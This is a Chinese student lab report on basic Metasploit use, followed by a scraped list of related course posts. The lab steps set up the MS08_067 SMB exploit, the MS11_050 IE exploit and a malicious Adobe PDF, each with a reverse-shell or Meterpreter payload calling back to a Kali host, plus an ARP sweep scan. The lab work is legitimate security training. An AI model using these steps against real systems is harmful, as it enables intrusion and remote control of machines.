实验要求

  • 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。
  • 一个主动攻击,如ms08_067;
  • 一个针对浏览器的攻击,如ms11_050;
  • 一个针对客户端的攻击,如Adobe
  • 成功应用任何一个辅助模块。

实验过程

  MS08_067漏洞测试

  • IP:kali:192.168.43.10windows 2003 :192.168.43.169
  • 使用命令msfconsole进入控制台,使用search ms08_067查看相关信息。

  • 得到了相应模块名。使用show payloads ,确定攻击载荷。

  • 使用命令 use exploit/windows/smb/ms08_067_netapi

  • set payload generic/shell_reverse_tcp选择playoad,并查看相关信息。

  • 使用命令show options确定按照显示出的信息进行修改。设置好监听ip,监听端口以及攻击ip。

  • 可以通过修改target的值,来选择我们具体想要攻击的计算机系统。也可以采用默认的自动选取,即target设置为0。

  • 使用exploit监听。

这里出现了错误!后来发现原来是445端口没有开。

  • 打开后将虚拟机重启。之后在进行监听,成功。

  • 使用ipconfig命令查看

  • 新建文件夹20145310

  MS11_050漏洞测试

  • 使用命令msfconsole命令进入控制台
  • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

  • 确定相应模块名之后,使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块

  • 使用命令info查看该模块的具体信息

  • 设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http。之后设置其相关参数

  • 使用命令exploit攻击,等待连接,漏洞主机访问该ip,ie浏览器溢出。

  Adobe阅读器漏洞攻击

  • 主机为kali的ip地址为:192.168.43.10、靶机windows xp 的ip地址为:192.168.43.54
  • 使用命令msfconsole进入控制台
  • 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块
  • 设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http
  • 使用命令show options来确定需要修改的参数。需要设置的参数有LHOSTLPORTFILENAME

  • 使用命令exploit生成5310.pdf。打开另一个终端,使用命令cp 5333.pdf /root/5333.pdf将其复制到根目录下

  • 退出并重新监听。

  • 将pdf文件在靶机中打开,连接成功。

  利用nmap扫描

  • 首先使用命令创建一个msf所需的数据库service postgresql start,msfdb start。
  • 开启msf,输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块。

  • 用show options查看需要设置的消息
  • 根据显示的消息进行设置,设置相关参数

  • 使用命令run开启扫描,结果如下

  • 使用命令nmap+ip地址(该ip地址我的电脑主机ip)结果如下

  • 实验问答

  • 什么是exploit、payload、encode

exploit:通过已有的漏洞进行攻击,监听的过程。

payload:是具体功能作用的代码。

encode: 对payload进行伪装的代码

 

20145310 《网络对抗》 MSF基础应用的更多相关文章

  1. 网络对抗——web基础

    网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165325 《网络对抗技术》 Exp5:MSF基础应用

    2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  7. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  8. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  9. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  10. 2017-2018-2 20155228 《网络对抗技术》 实验五:MSF基础应用

    2017-2018-2 20155228 <网络对抗技术> 实验五:MSF基础应用 1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需 ...

随机推荐

  1. wf-pagination-javascript 分页

    1 <?php isset($_REQUEST['form_single_page_num']) && !empty($_REQUEST['form_single_page_nu ...

  2. createrepo local http yum

    https://www.jianshu.com/p/59ca879584a1   repodata作为软件的仓库,其目录下有四个必要文件:filelists.xml.[gz],other.xml.[g ...

  3. OKEX API

    本文介绍OKEX API Rest 开始使用 REST,即Representational State Transfer的缩写,是目前最流行的一种互联网软件架构.它结构清晰.符合标准.易于理解.扩展方 ...

  4. QS Network---zoj1586最小生成树

    Description Sunny Cup 2003 - Preliminary Round April 20th, 12:00 - 17:00 Problem E: QS Network In th ...

  5. 10个实用的Django建议(转)

    前言:随着Django1.4第二个候选版的发布,虽然还不支持Python3,但Django团队已经在着手计划中,据官方博客所说, Django1.5将会试验性的支持python3.Django 作为一 ...

  6. android动态设置边框颜色

    <?xml version="1.0" encoding="utf-8"?> <shape xmlns:android="http: ...

  7. android studio常用控件

    1.Button设置不同的样式 <?xml version="1.0" encoding="utf-8"?> <selector xmlns: ...

  8. Bind()事件

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  9. [LeetCode] 161. One Edit Distance_Medium

    Given two strings s and t, determine if they are both one edit distance apart. Note: There are 3 pos ...

  10. JQuery表单元素过滤选择器

    此选择器主要是对所选择的表单元素进行过滤: 选择器 描述 返回 enabled 选择所有的可用的元素 集合元素 disabled 选择所有的不可用的元素 集合元素 checked 选择所有被选中的元素 ...